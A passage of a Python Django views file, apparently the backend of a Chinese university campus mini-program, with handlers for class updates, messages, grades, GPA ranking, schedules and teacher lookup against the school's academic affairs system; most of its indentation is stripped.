if str(e) == "'NoneType' object has no attribute 'get'":
return HttpResponse(json.dumps({'err':'教务系统挂掉了,请等待修复后重试~'}, ensure_ascii=False),
content_type="application/json,charset=utf-8")
traceback.print_exc()
return mywarn("登录未知错误",str(e),xh,pswd)
else:
return HttpResponse(json.dumps({'err':'请使用post并提交正确数据'}, ensure_ascii=False),
content_type="application/json,charset=utf-8")
def refresh_class(request):
myconfig = Config.objects.all().first()
if myconfig.apichange:
data = {
'xh':request.POST.get("xh"),
'pswd':request.POST.get("pswd")
}
res = requests.post(url=myconfig.otherapi+"/info/refreshclass",data=data)
return HttpResponse(json.dumps(json.loads(res.text), ensure_ascii=False),
content_type="application/json,charset=utf-8")
if myconfig.maintenance:
return HttpResponse(json.dumps({'err':'教务系统出错维护中,请静待教务系统恢复正常!'}, ensure_ascii=False),
content_type="application/json,charset=utf-8")
# if mpconfig["loginbad"]:
# return HttpResponse(json.dumps({'err':'当前教务系统无法请求登录,请待学校修复!'}, ensure_ascii=False),
# content_type="application/json,charset=utf-8")
if request.method == 'POST':
if request.POST:
xh = request.POST.get("xh")
pswd = request.POST.get("pswd")
else:
return HttpResponse(json.dumps({'err':'请提交正确的post数据'}, ensure_ascii=False),
content_type="application/json,charset=utf-8")
if not Students.objects.filter(studentId=int(xh)):
content = ('【%s】[%s]未登录更新班级信息' % (datetime.datetime.now().strftime('%H:%M:%S'), xh))
writeLog(content)
return HttpResponse(json.dumps({'err':'还未登录,请重新登录!'}, ensure_ascii=False),
content_type="application/json,charset=utf-8")
else:
stu = Students.objects.get(studentId=int(xh))
try:
startTime = time.time()
print('【%s】更新了班级信息' % stu.name)
JSESSIONID = str(stu.JSESSIONID)
route = str(stu.route)
cookies_dict = {
'JSESSIONID': JSESSIONID,
'route': route
}
cookies = requests.utils.cookiejar_from_dict(cookies_dict)
person = GetInfo(base_url=base_url, cookies=cookies)
nowClass = person.get_now_class()
try:
if nowClass.get('err'):
if nowClass.get('err') == "Connect Timeout":
return mywarn("更新班级超时","",xh,pswd)
except:
pass
if stu.className == nowClass:
return HttpResponse(json.dumps({'err':"你的班级并未发生变化~"}, ensure_ascii=False), content_type="application/json,charset=utf-8")
Students.objects.filter(studentId=int(xh)).update(className=nowClass)
endTime = time.time()
spendTime = endTime - startTime
content = ('【%s】[%s]更新了班级信息,耗时%.2fs' % (datetime.datetime.now().strftime('%H:%M:%S'), stu.name, spendTime))
writeLog(content)
return HttpResponse(json.dumps({'success':"你已成功变更到【"+ nowClass + "】!",'class':nowClass}, ensure_ascii=False), content_type="application/json,charset=utf-8")
except Exception as e:
content = ('【%s】[%s]更新班级信息出错' % (datetime.datetime.now().strftime('%H:%M:%S'), stu.name))
writeLog(content)
if str(e) == "'NoneType' object has no attribute 'get'":
return HttpResponse(json.dumps({'err':'教务系统挂掉了,请等待修复后重试~'}, ensure_ascii=False),
content_type="application/json,charset=utf-8")
if "Connection broken" in str(e) or 'ECONNRESET' in str(e):
return refresh_class(request)
if 'Expecting value' not in str(e):
traceback.print_exc()
return mywarn("更新班级错误",str(e),xh,pswd)
if myconfig.isKaptcha:
return get_kaptcha(xh)
else:
sta = update_cookies(request)
person = GetInfo(base_url=base_url, cookies=sta)
nowClass = person.get_now_class()
if stu.className == nowClass:
return HttpResponse(json.dumps({'err':"你的班级并未发生变化~"}, ensure_ascii=False), content_type="application/json,charset=utf-8")
Students.objects.filter(studentId=int(xh)).update(className=nowClass)
return HttpResponse(json.dumps({'success':"你已成功变更到【"+ nowClass + "】!",'class':nowClass}, ensure_ascii=False), content_type="application/json,charset=utf-8")
else:
return HttpResponse(json.dumps({'err':'请使用post并提交正确数据'}, ensure_ascii=False),
content_type="application/json,charset=utf-8")
def get_message(request):
myconfig = Config.objects.all().first()
if myconfig.apichange:
data = {
'xh':request.POST.get("xh"),
'pswd':request.POST.get("pswd")
}
res = requests.post(url=myconfig.otherapi+"/info/message",data=data)
return HttpResponse(json.dumps(json.loads(res.text), ensure_ascii=False),
content_type="application/json,charset=utf-8")
if myconfig.maintenance:
return HttpResponse(json.dumps({'err':'教务系统出错维护中,请静待教务系统恢复正常!'}, ensure_ascii=False),
content_type="application/json,charset=utf-8")
# if mpconfig["jwxtbad"]:
# return HttpResponse(json.dumps({'err':'当前教务系统无法访问(可能是学校机房断电或断网所致),小程序暂时无法登录和更新,请待学校修复!'}, ensure_ascii=False),
# content_type="application/json,charset=utf-8")
if request.method == 'POST':
if request.POST:
xh = request.POST.get("xh")
pswd = request.POST.get("pswd")
else:
return HttpResponse(json.dumps({'err':'请提交正确的post数据'}, ensure_ascii=False),
content_type="application/json,charset=utf-8")
if not Students.objects.filter(studentId=int(xh)):
content = ('【%s】[%s]未登录访问消息' % (datetime.datetime.now().strftime('%H:%M:%S'), xh))
writeLog(content)
return HttpResponse(json.dumps({'err':'还未登录,请重新登录!'}, ensure_ascii=False),
content_type="application/json,charset=utf-8")
else:
stu = Students.objects.get(studentId=int(xh))
try:
startTime = time.time()
# print('【%s】查看了消息' % stu.name)
JSESSIONID = str(stu.JSESSIONID)
route = str(stu.route)
cookies_dict = {
'JSESSIONID': JSESSIONID,
'route': route
}
cookies = requests.utils.cookiejar_from_dict(cookies_dict)
person = GetInfo(base_url=base_url, cookies=cookies)
message = person.get_message()
endTime = time.time()
spendTime = endTime - startTime
# content = ('【%s】[%s]访问了消息,耗时%.2fs' % (datetime.datetime.now().strftime('%H:%M:%S'), stu.name, spendTime))
# writeLog(content)
return HttpResponse(json.dumps(message, ensure_ascii=False), content_type="application/json,charset=utf-8")
except Exception as e:
if "Connection broken" in str(e) or 'ECONNRESET' in str(e):
# return get_message(request)
return HttpResponse(json.dumps({'err':"请重新刷新一下"}, ensure_ascii=False),
content_type="application/json,charset=utf-8")
else:
content = ('【%s】[%s]访问消息出错' % (datetime.datetime.now().strftime('%H:%M:%S'), stu.name))
writeLog(content)
if str(e) == 'Expecting value: line 1 column 1 (char 0)':
return HttpResponse(json.dumps({'err':'教务系统挂掉了,请等待修复后重试~'}, ensure_ascii=False),
content_type="application/json,charset=utf-8")
if str(e) != 'Expecting value: line 6 column 1 (char 11)':
traceback.print_exc()
return mywarn("消息请求错误",str(e),xh,pswd)
if myconfig.isKaptcha:
return get_kaptcha(xh)
else:
sta = update_cookies(request)
person = GetInfo(base_url=base_url, cookies=sta)
message = person.get_message()
return HttpResponse(json.dumps(message, ensure_ascii=False), content_type="application/json,charset=utf-8")
else:
return HttpResponse(json.dumps({'err':'请使用post并提交正确数据'}, ensure_ascii=False),
content_type="application/json,charset=utf-8")
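# get_study serves the cached Study.json when refresh == "no"; after a successful fetch the
# returned GPA is also persisted on the student record (empty/None values stored as "init",
# which get_position later uses to skip students without a usable GPA).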
def get_study(request):
myconfig = Config.objects.all().first()
if myconfig.apichange:
data = {
'xh':request.POST.get("xh"),
'pswd':request.POST.get("pswd"),
'refresh':request.POST.get("refresh")
}
res = requests.post(url=myconfig.otherapi+"/info/study",data=data)
return HttpResponse(json.dumps(json.loads(res.text), ensure_ascii=False),
content_type="application/json,charset=utf-8")
if myconfig.maintenance:
return HttpResponse(json.dumps({'err':'教务系统出错维护中,请静待教务系统恢复正常!'}, ensure_ascii=False),
content_type="application/json,charset=utf-8")
# if mpconfig["studybad"]:
# return HttpResponse(json.dumps({'err':'当前教务系统无法请求学业,请待学校修复!'}, ensure_ascii=False),
# content_type="application/json,charset=utf-8")
if request.method == 'POST':
if request.POST:
xh = request.POST.get("xh")
pswd = request.POST.get("pswd")
refresh = request.POST.get("refresh")
else:
return HttpResponse(json.dumps({'err':'请提交正确的post数据'}, ensure_ascii=False),
content_type="application/json,charset=utf-8")
if not Students.objects.filter(studentId=int(xh)):
content = ('【%s】[%s]未登录访问学业情况' % (datetime.datetime.now().strftime('%H:%M:%S'), xh))
writeLog(content)
return HttpResponse(json.dumps({'err':'还未登录,请重新登录!'}, ensure_ascii=False),
content_type="application/json,charset=utf-8")
else:
stu = Students.objects.get(studentId=int(xh))
if refresh == "no":
filename = ('Study')
cache = cacheData(xh, filename)
if cache is not None:
# print('cache')
print('【%s】查看了学业缓存' % stu.name)
return HttpResponse(json.dumps(cache, ensure_ascii=False),
content_type="application/json,charset=utf-8")
else:
pass
try:
startTime = time.time()
print('【%s】查看了学业情况' % stu.name)
JSESSIONID = str(stu.JSESSIONID)
route = str(stu.route)
cookies_dict = {
'JSESSIONID': JSESSIONID,
'route': route
}
cookies = requests.utils.cookiejar_from_dict(cookies_dict)
person = GetInfo(base_url=base_url, cookies=cookies)
study = person.get_study(xh)
if study.get("err") == 'Connect Timeout':
if myconfig.isKaptcha:
return get_kaptcha(xh)
else:
sta = update_cookies(request)
person = GetInfo(base_url=base_url, cookies=sta)
study = person.get_study(xh)
                        gpa = str(study["gpa"]) if study.get("gpa") not in ("", None) else "init"
Students.objects.filter(studentId=int(xh)).update(gpa=gpa)
filename = ('Study')
newData(xh, filename, json.dumps(study, ensure_ascii=False))
return HttpResponse(json.dumps(study, ensure_ascii=False),
content_type="application/json,charset=utf-8")
endTime = time.time()
spendTime = endTime - startTime
content = ('【%s】[%s]访问了学业情况,耗时%.2fs' % (datetime.datetime.now().strftime('%H:%M:%S'), stu.name, spendTime))
writeLog(content)
                gpa = str(study["gpa"]) if study.get("gpa") not in ("", None) else "init"
Students.objects.filter(studentId=int(xh)).update(gpa=gpa)
filename = ('Study')
newData(xh, filename, json.dumps(study, ensure_ascii=False))
return HttpResponse(json.dumps(study, ensure_ascii=False), content_type="application/json,charset=utf-8")
except Exception as e:
if "Connection broken" in str(e) or 'ECONNRESET' in str(e):
# return get_study(request)
return HttpResponse(json.dumps({'err':'更新出现问题,请待教务系统修复'}, ensure_ascii=False),
content_type="application/json,charset=utf-8")
elif "list index out of range" in str(e) and int(xh[0:2]) >= int(myconfig.nGrade[2:4]):
return HttpResponse(json.dumps({'err':'暂无学业信息或请先刷新“我的成绩”后访问'}, ensure_ascii=False),
content_type="application/json,charset=utf-8")
else:
content = ('【%s】[%s]访问学业情况出错' % (datetime.datetime.now().strftime('%H:%M:%S'), stu.name))
writeLog(content)
if str(e) != 'list index out of range':
traceback.print_exc()
return mywarn("学业请求错误",str(e),xh,pswd)
if myconfig.isKaptcha:
return get_kaptcha(xh)
else:
sta = update_cookies(request)
person = GetInfo(base_url=base_url, cookies=sta)
study = person.get_study(xh)
                        gpa = str(study["gpa"]) if study.get("gpa") not in ("", None) else "init"
Students.objects.filter(studentId=int(xh)).update(gpa=gpa)
filename = ('Study')
newData(xh, filename, json.dumps(study, ensure_ascii=False))
return HttpResponse(json.dumps(study, ensure_ascii=False), content_type="application/json,charset=utf-8")
else:
return HttpResponse(json.dumps({'err':'请使用post并提交正确数据'}, ensure_ascii=False),
content_type="application/json,charset=utf-8")
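# get_grade caches each term as Grades-<year><term>.json. The cached copy is only returned for
# terms older than the current one recorded in Config.nGrade, so grades for the latest term are
# always re-fetched from the jwxt system.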
def get_grade(request):
myconfig = Config.objects.all().first()
if myconfig.apichange:
data = {
'xh':request.POST.get("xh"),
'pswd':request.POST.get("pswd"),
'year':request.POST.get("year"),
'term':request.POST.get("term"),
'refresh':request.POST.get("refresh")
}
        res = requests.post(url=myconfig.otherapi+"/info/grade",data=data)
return HttpResponse(json.dumps(json.loads(res.text), ensure_ascii=False),
content_type="application/json,charset=utf-8")
if myconfig.maintenance:
return HttpResponse(json.dumps({'err':'教务系统出错维护中,请静待教务系统恢复正常!'}, ensure_ascii=False),
content_type="application/json,charset=utf-8")
# if mpconfig["gradebad"]:
# return HttpResponse(json.dumps({'err':'当前教务系统无法请求成绩,请待学校修复!'}, ensure_ascii=False),
# content_type="application/json,charset=utf-8")
if request.method == 'POST':
if request.POST:
xh = request.POST.get("xh")
pswd = request.POST.get("pswd")
year = request.POST.get("year")
term = request.POST.get("term")
refresh = request.POST.get("refresh")
else:
return HttpResponse(json.dumps({'err':'请提交正确的post数据'}, ensure_ascii=False),
content_type="application/json,charset=utf-8")
if not Students.objects.filter(studentId=int(xh)):
content = ('【%s】[%s]未登录访问成绩' % (datetime.datetime.now().strftime('%H:%M:%S'), xh))
writeLog(content)
return HttpResponse(json.dumps({'err':'还未登录,请重新登录!'}, ensure_ascii=False),
content_type="application/json,charset=utf-8")
else:
stu = Students.objects.get(studentId=int(xh))
if refresh == "no":
filename = ('Grades-%s%s' % (str(year), str(term)))
cache = cacheData(xh, filename)
if cache is not None:
# print('cache')
                    # the unused isLast() wrapper was removed: ny/nt must be defined in this
                    # scope for the freshness checks below, otherwise they raise a NameError
                    ny = (myconfig.nGrade)[0:4]
                    nt = (myconfig.nGrade)[4:5]
if str(year) == ny:
pass
else:
if int(nt)-1 == 0 and int(term)==2:
pass
else:
print('【%s】查看了%s-%s的成绩缓存' % (stu.name, year, term))
return HttpResponse(json.dumps(cache, ensure_ascii=False),
content_type="application/json,charset=utf-8")
else:
pass
try:
startTime = time.time()
print('【%s】查看了%s-%s的成绩' % (stu.name, year, term))
JSESSIONID = str(stu.JSESSIONID)
route = str(stu.route)
cookies_dict = {
'JSESSIONID': JSESSIONID,
'route': route
}
cookies = requests.utils.cookiejar_from_dict(cookies_dict)
person = GetInfo(base_url=base_url, cookies=cookies)
grade = person.get_grade(year, term)
if grade.get("err"):
if grade.get("err") == "Connect Timeout":
# update_cookies(xh, pswd)
# return mywarn("成绩超时","",xh,pswd)
return get_kaptcha(xh)
elif grade.get("err") == "No Data":
if int(xh[0:2]) > int(myconfig.nGrade[2:4]):
return HttpResponse(json.dumps({'err':"当前你还没有任何成绩信息"}, ensure_ascii=False), content_type="application/json,charset=utf-8")
else:
return HttpResponse(json.dumps({'err':"还没有" + year+"-"+term + "学期的成绩,点击顶栏也看看以前的吧~"}, ensure_ascii=False), content_type="application/json,charset=utf-8")
elif grade.get("err") == "Error Term":
return HttpResponse(json.dumps({'err':"网络问题,请重新访问请求课程"}, ensure_ascii=False), content_type="application/json,charset=utf-8")
                Students.objects.filter(studentId=int(xh)).update(
                    gpa=grade.get("gpa") if grade.get("gpa") not in ("", None) else "init")
endTime = time.time()
spendTime = endTime - startTime
content = ('【%s】[%s]访问了%s-%s的成绩,耗时%.2fs' % (
datetime.datetime.now().strftime('%H:%M:%S'), stu.name, year, term, spendTime))
writeLog(content)
filename = ('Grades-%s%s' % (str(year), str(term)))
newData(xh, filename, json.dumps(grade, ensure_ascii=False))
# print('write')
return HttpResponse(json.dumps(grade, ensure_ascii=False), content_type="application/json,charset=utf-8")
except Exception as e:
# print(e)
if "Connection broken" in str(e) or 'ECONNRESET' in str(e):
# return get_grade(request)
return HttpResponse(json.dumps({'err':"请重新刷新一下"}, ensure_ascii=False),
content_type="application/json,charset=utf-8")
else:
content = ('【%s】[%s]访问成绩出错' % (datetime.datetime.now().strftime('%H:%M:%S'), stu.name))
writeLog(content)
if str(e) == 'Expecting value: line 1 column 1 (char 0)':
return HttpResponse(json.dumps({'err':'教务系统挂掉了,请等待修复后重试~'}, ensure_ascii=False),
content_type="application/json,charset=utf-8")
if str(e) != 'Expecting value: line 3 column 1 (char 4)':
traceback.print_exc()
return mywarn("成绩请求错误",str(e),xh,pswd)
if myconfig.isKaptcha:
return get_kaptcha(xh)
else:
sta = update_cookies(request)
person = GetInfo(base_url=base_url, cookies=sta)
grade = person.get_grade(year, term)
if grade.get("gpa") == "" or grade.get("gpa") is None:
return HttpResponse(json.dumps({'err':'平均学分绩点获取失败,请重试~'}, ensure_ascii=False),
content_type="application/json,charset=utf-8")
Students.objects.filter(studentId=int(xh)).update(gpa = grade.get("gpa"))
filename = ('Grades-%s%s' % (str(year), str(term)))
newData(xh, filename, json.dumps(grade, ensure_ascii=False))
return HttpResponse(json.dumps(grade, ensure_ascii=False), content_type="application/json,charset=utf-8")
else:
return HttpResponse(json.dumps({'err':'请使用post并提交正确数据'}, ensure_ascii=False),
content_type="application/json,charset=utf-8")
# def get_grade2(request):
# myconfig = Config.objects.all().first()
# if myconfig.apichange:
# data = {
# 'xh':request.POST.get("xh"),
# 'pswd':request.POST.get("pswd"),
# 'year':request.POST.get("year"),
# 'term':request.POST.get("term"),
# 'refresh':request.POST.get("refresh")
# }
# res = requests.post(url=myconfig.otherapi+"/info/grade",data=data)
# return HttpResponse(json.dumps(json.loads(res.text), ensure_ascii=False),
# content_type="application/json,charset=utf-8")
# if myconfig.maintenance:
# return HttpResponse(json.dumps({'err':'教务系统出错维护中,请静待教务系统恢复正常!'}, ensure_ascii=False),
# content_type="application/json,charset=utf-8")
# # if mpconfig["gradebad"]:
# # return HttpResponse(json.dumps({'err':'当前教务系统无法请求成绩,请待学校修复!'}, ensure_ascii=False),
# # content_type="application/json,charset=utf-8")
# if request.method == 'POST':
# if request.POST:
# xh = request.POST.get("xh")
# pswd = request.POST.get("pswd")
# year = request.POST.get("year")
# term = request.POST.get("term")
# refresh = request.POST.get("refresh")
# else:
# return HttpResponse(json.dumps({'err':'请提交正确的post数据'}, ensure_ascii=False),
# content_type="application/json,charset=utf-8")
# if not Students.objects.filter(studentId=int(xh)):
# content = ('【%s】[%s]未登录访问成绩' % (datetime.datetime.now().strftime('%H:%M:%S'), xh))
# writeLog(content)
# return HttpResponse(json.dumps({'err':'还未登录,请重新登录!'}, ensure_ascii=False),
# content_type="application/json,charset=utf-8")
# else:
# stu = Students.objects.get(studentId=int(xh))
# if refresh == "no":
# filename = ('GradesN-%s%s' % (str(year), str(term)))
# cache = cacheData(xh, filename)
# if cache is not None:
# # print('cache')
# print('【%s】查看了%s-%s的成绩缓存' % (stu.name, year, term))
# return HttpResponse(json.dumps(cache, ensure_ascii=False),
# content_type="application/json,charset=utf-8")
# else:
# pass
# try:
# startTime = time.time()
# print('【%s】查看了%s-%s的成绩' % (stu.name, year, term))
# JSESSIONID = str(stu.JSESSIONID)
# route = str(stu.route)
# cookies_dict = {
# 'JSESSIONID': JSESSIONID,
# 'route': route
# }
# cookies = requests.utils.cookiejar_from_dict(cookies_dict)
# person = GetInfo(base_url=base_url, cookies=cookies)
# grade = person.get_grade2(year, term)
# if grade.get("err") == "请求超时,鉴于教务系统特色,已帮你尝试重新登录,重试几次,还不行请麻烦你自行重新登录,或者在关于里面反馈!当然,也可能是教务系统挂了~":
# update_cookies(xh, pswd)
# return HttpResponse(json.dumps({'err':grade.get("err")}, ensure_ascii=False), content_type="application/json,charset=utf-8")
# if grade.get("err") == "看起来你这学期好像还没有出成绩,点击顶栏也看看以前的吧~":
# return HttpResponse(json.dumps({'err':grade.get("err")}, ensure_ascii=False), content_type="application/json,charset=utf-8")
# Students.objects.filter(studentId=int(xh)).update(gpa = grade.get("gpa"))
# endTime = time.time()
# spendTime = endTime - startTime
# content = ('【%s】[%s]访问了%s-%s的成绩,耗时%.2fs' % (
# datetime.datetime.now().strftime('%H:%M:%S'), stu.name, year, term, spendTime))
# writeLog(content)
# filename = ('GradesN-%s%s' % (str(year), str(term)))
# newData(xh, filename, json.dumps(grade, ensure_ascii=False))
# # print('write')
# return HttpResponse(json.dumps(grade, ensure_ascii=False), content_type="application/json,charset=utf-8")
# except Exception as e:
# # print(e)
# if "Connection broken" in str(e) or 'ECONNRESET' in str(e):
# # return get_grade2(request)
# return HttpResponse(json.dumps({'err':'更新出现问题,请待教务系统修复'}, ensure_ascii=False),
# content_type="application/json,charset=utf-8")
# else:
# content = ('【%s】[%s]访问成绩出错' % (datetime.datetime.now().strftime('%H:%M:%S'), stu.name))
# writeLog(content)
# if str(e) == 'Expecting value: line 1 column 1 (char 0)':
# return HttpResponse(json.dumps({'err':'教务系统挂掉了,请等待修复后重试~'}, ensure_ascii=False),
# content_type="application/json,charset=utf-8")
# if str(e) != 'Expecting value: line 3 column 1 (char 4)':
# traceback.print_exc()
# return mywarn("成绩请求错误",str(e),xh,pswd)
# sta = update_cookies(xh, pswd)
# person = GetInfo(base_url=base_url, cookies=sta)
# grade = person.get_grade2(year, term)
# if grade.get("gpa") == "" or grade.get("gpa") is None:
# return HttpResponse(json.dumps({'err':'平均学分绩点获取失败,请重试~'}, ensure_ascii=False),
# content_type="application/json,charset=utf-8")
# Students.objects.filter(studentId=int(xh)).update(gpa = grade.get("gpa"))
# filename = ('GradesN-%s%s' % (str(year), str(term)))
# newData(xh, filename, json.dumps(grade, ensure_ascii=False))
# return HttpResponse(json.dumps(grade, ensure_ascii=False), content_type="application/json,charset=utf-8")
# else:
# return HttpResponse(json.dumps({'err':'请使用post并提交正确数据'}, ensure_ascii=False),
# content_type="application/json,charset=utf-8")
def get_schedule(request):
myconfig = Config.objects.all().first()
if myconfig.apichange:
data = {
'xh':request.POST.get("xh"),
'pswd':request.POST.get("pswd"),
'year':request.POST.get("year"),
'term':request.POST.get("term"),
'refresh':request.POST.get("refresh")
}
res = requests.post(url=myconfig.otherapi+"/info/schedule",data=data)
return HttpResponse(json.dumps(json.loads(res.text), ensure_ascii=False),
content_type="application/json,charset=utf-8")
if myconfig.maintenance:
return HttpResponse(json.dumps({'err':'教务系统出错维护中,请静待教务系统恢复正常!'}, ensure_ascii=False),
content_type="application/json,charset=utf-8")
# if mpconfig["schedulebad"]:
# return HttpResponse(json.dumps({'err':'当前教务系统无法请求课表,请待学校修复!'}, ensure_ascii=False),
# content_type="application/json,charset=utf-8")
if request.method == 'POST':
if request.POST:
xh = request.POST.get("xh")
pswd = request.POST.get("pswd")
year = request.POST.get("year")
term = request.POST.get("term")
refresh = request.POST.get("refresh")
else:
return HttpResponse(json.dumps({'err':'请提交正确的post数据'}, ensure_ascii=False),
content_type="application/json,charset=utf-8")
if not Students.objects.filter(studentId=int(xh)):
content = ('【%s】[%s]未登录访问课程' % (datetime.datetime.now().strftime('%H:%M:%S'), xh))
writeLog(content)
return HttpResponse(json.dumps({'err':'还未登录,请重新登录!'}, ensure_ascii=False),
content_type="application/json,charset=utf-8")
else:
stu = Students.objects.get(studentId=int(xh))
if refresh == "no":
filename = ('Schedules-%s%s' % (str(year), str(term)))
cache = cacheData(xh, filename)
if cache is not None:
# print('cache')
print('【%s】查看了%s-%s的课表缓存' % (stu.name, year, term))
return HttpResponse(json.dumps(cache, ensure_ascii=False),
content_type="application/json,charset=utf-8")
else:
pass
try:
startTime = time.time()
print('【%s】查看了%s-%s的课程' % (stu.name, year, term))
JSESSIONID = str(stu.JSESSIONID)
route = str(stu.route)
cookies_dict = {
'JSESSIONID': JSESSIONID,
'route': route
}
cookies = requests.utils.cookiejar_from_dict(cookies_dict)
person = GetInfo(base_url=base_url, cookies=cookies)
schedule = person.get_schedule(year, term)
if schedule.get('err'):
if schedule.get('err') == "Connect Timeout":
return mywarn("更新课程超时","",xh,pswd)
elif schedule.get('err') == "Error Term":
return HttpResponse(json.dumps({'err':"网络问题,请重新访问请求课程"}, ensure_ascii=False), content_type="application/json,charset=utf-8")
endTime = time.time()
spendTime = endTime - startTime
content = ('【%s】[%s]访问了%s-%s的课程,耗时%.2fs' % (
datetime.datetime.now().strftime('%H:%M:%S'), stu.name, year, term, spendTime))
writeLog(content)
filename = ('Schedules-%s%s' % (str(year), str(term)))
newData(xh, filename, json.dumps(schedule, ensure_ascii=False))
# print('write')
return HttpResponse(json.dumps(schedule, ensure_ascii=False), content_type="application/json,charset=utf-8")
except Exception as e:
if "Connection broken" in str(e) or 'ECONNRESET' in str(e):
# return get_schedule(request)
return HttpResponse(json.dumps({'err':"请重新刷新一下"}, ensure_ascii=False),
content_type="application/json,charset=utf-8")
else:
content = ('【%s】[%s]访问课程出错' % (datetime.datetime.now().strftime('%H:%M:%S'), stu.name))
writeLog(content)
if str(e) == 'Expecting value: line 1 column 1 (char 0)':
return HttpResponse(json.dumps({'err':'教务系统挂掉了,请等待修复后重试~'}, ensure_ascii=False),
content_type="application/json,charset=utf-8")
if str(e) != 'Expecting value: line 3 column 1 (char 4)':
traceback.print_exc()
return mywarn("课程请求错误",str(e),xh,pswd)
if myconfig.isKaptcha:
return get_kaptcha(xh)
else:
sta = update_cookies(request)
person = GetInfo(base_url=base_url, cookies=sta)
schedule = person.get_schedule(year, term)
filename = ('Schedules-%s%s' % (str(year), str(term)))
newData(xh, filename, json.dumps(schedule, ensure_ascii=False))
return HttpResponse(json.dumps(schedule, ensure_ascii=False), content_type="application/json,charset=utf-8")
else:
return HttpResponse(json.dumps({'err':'请使用post并提交正确数据'}, ensure_ascii=False),
content_type="application/json,charset=utf-8")
def joinDetail(request):
myconfig = Config.objects.all().first()
if myconfig.apichange:
res = requests.get(url=myconfig.otherapi+"/info/joindetail?type=" + request.GET.get("type"))
return HttpResponse(json.dumps(json.loads(res.text), ensure_ascii=False),
content_type="application/json,charset=utf-8")
type = request.GET.get("type")
allUsers = Students.objects.filter().all().count()
if type == 'college':
detail = [{
'collegeName': i["collegeName"],
'collegeNum': Students.objects.filter(collegeName=i["collegeName"]).count()
} for i in Students.objects.values('collegeName').distinct().order_by('collegeName')]
ndetail = sorted(detail,key=lambda keys:keys['collegeNum'], reverse=True)
res = {
'allUsers': allUsers,
'collegeNum': int(Students.objects.values('collegeName').distinct().order_by('collegeName').count()),
'detail': ndetail
}
elif type == 'major':
detail = [{
'majorName': i["majorName"],
'majorNum': Students.objects.filter(majorName=i["majorName"]).count()
} for i in Students.objects.values('majorName').distinct().order_by('majorName')]
ndetail = sorted(detail,key=lambda keys:keys['majorNum'], reverse=True)
res = {
'allUsers': allUsers,
'majorNum': int(Students.objects.values('majorName').distinct().order_by('majorName').count()),
'detail': ndetail
}
elif type == 'class':
detail = [{
'className': i["className"],
'classNum': Students.objects.filter(className=i["className"]).count()
} for i in Students.objects.values('className').distinct().order_by('className')]
ndetail = sorted(detail,key=lambda keys:keys['classNum'], reverse=True)
res = {
'allUsers': allUsers,
'classNum': int(Students.objects.values('className').distinct().order_by('className').count()),
'detail': ndetail
}
return HttpResponse(json.dumps(res, ensure_ascii=False),
content_type="application/json,charset=utf-8")
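# get_position ranks a student within their major (same enrolment year) and class by walking the
# other students ordered by the stored GPA string in descending order and counting how many rank
# ahead; records whose GPA is still "init" are tallied separately as nMajorCount/nClassCount.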
def get_position(request):
myconfig = Config.objects.all().first()
if myconfig.apichange:
res = requests.get(url=myconfig.otherapi+"/info/position?xh=" + request.GET.get("xh"))
return HttpResponse(json.dumps(json.loads(res.text), ensure_ascii=False),
content_type="application/json,charset=utf-8")
#print(request)
xh = request.GET.get("xh")
if xh is None:
return HttpResponse(json.dumps({'err':'参数不全'}, ensure_ascii=False),
content_type="application/json,charset=utf-8")
if not Students.objects.filter(studentId=int(xh)):
return HttpResponse(json.dumps({'err':'还未登录,请重新登录!'}, ensure_ascii=False),
content_type="application/json,charset=utf-8")
else:
stu = Students.objects.get(studentId=int(xh))
majorName = stu.majorName
className = stu.className
majorNum = Students.objects.filter(majorName=majorName,studentId__startswith=int(xh[0:2])).all().count()
classNum = Students.objects.filter(className=className).all().count()
if stu.gpa == "init":
gpa = "init"
return HttpResponse(json.dumps({'gpa': gpa,'majorCount':0,'classCount':0,'majorNum':majorNum,'classNum':classNum,'nMajorCount':"init",'nClassCount':"init"}, ensure_ascii=False),
content_type="application/json,charset=utf-8")
else:
gpa = float(stu.gpa)
majorCount = 1
classCount = 1
nMajorCount = 0
nClassCount = 0
for m in Students.objects.filter(majorName=majorName).all().order_by('-gpa'):
if m.gpa == "init" and str(m.studentId)[0:2] == xh[0:2]:
nMajorCount += 1
elif m.gpa == "init" or str(m.studentId)[0:2] != xh[0:2]:
pass
elif gpa >= float(m.gpa):
break
else:
majorCount += 1
for c in Students.objects.filter(className=className).all().order_by('-gpa'):
if c.gpa == "init":
nClassCount += 1
elif gpa >= float(c.gpa):
break
else:
classCount += 1
return HttpResponse(json.dumps({'gpa': str(gpa),'majorCount':majorCount,'nMajorCount':nMajorCount,'nClassCount':nClassCount,'classCount':classCount,'majorNum':majorNum,'classNum':classNum}, ensure_ascii=False),
content_type="application/json,charset=utf-8")
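# searchTeacher enforces a daily quota stored in Students.searchTimes as "YYYY-MM-DD,<remaining>":
# on a new day the quota resets to 4 lookups for class monitors (classMonitor == 1) and 2 for
# everyone else; within the same day a lookup is only charged when it actually returns results.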
def searchTeacher(request):
myconfig = Config.objects.all().first()
if request.method == "GET":
xh = request.GET.get("xh")
tname = request.GET.get("tname")
if myconfig.apichange:
res = requests.get(url=myconfig.otherapi+"/info/steacher?xh=" + request.GET.get("xh") + "&tname=" + request.GET.get("tname"))
return HttpResponse(json.dumps(json.loads(res.text), ensure_ascii=False),
content_type="application/json,charset=utf-8")
elif request.method == "POST":
xh = request.POST.get("xh")
tname = request.POST.get("tname")
if myconfig.apichange:
data = {
'xh':request.POST.get("xh"),
'tname':request.POST.get("tname")
}
res = requests.post(url=myconfig.otherapi+"/info/steacher",data=data)
return HttpResponse(json.dumps(json.loads(res.text), ensure_ascii=False),
content_type="application/json,charset=utf-8")
if xh is None or tname is None:
return HttpResponse(json.dumps({'err': '参数不全'}, ensure_ascii=False),
content_type="application/json,charset=utf-8")
else:
if not Students.objects.filter(studentId=int(xh)):
return HttpResponse(json.dumps({'err':'还未登录,请重新登录!'}, ensure_ascii=False),
content_type="application/json,charset=utf-8")
else:
date = datetime.datetime.now().strftime('%Y-%m-%d')
stu = Students.objects.filter(studentId=int(xh))
thisStu = Students.objects.get(studentId=int(xh))
lastTime = thisStu.searchTimes.split(',')[0]
remainTimes = thisStu.searchTimes.split(',')[1]
if lastTime == date:
if remainTimes != '0':
searchList = []
for s in Teachers.objects.filter(name__contains=tname).order_by('name'):
item = {
'name': s.name,
'collegeName': s.collegeName,
'title': s.title,
'phoneNumber': s.phoneNumber
}
searchList.append(item)
content = ('【%s】%s学号查询[%s]' % (datetime.datetime.now().strftime('%H:%M:%S'), xh, tname))
writeLog(content)
if len(searchList) != 0:
nremainTimes = int(remainTimes) - 1
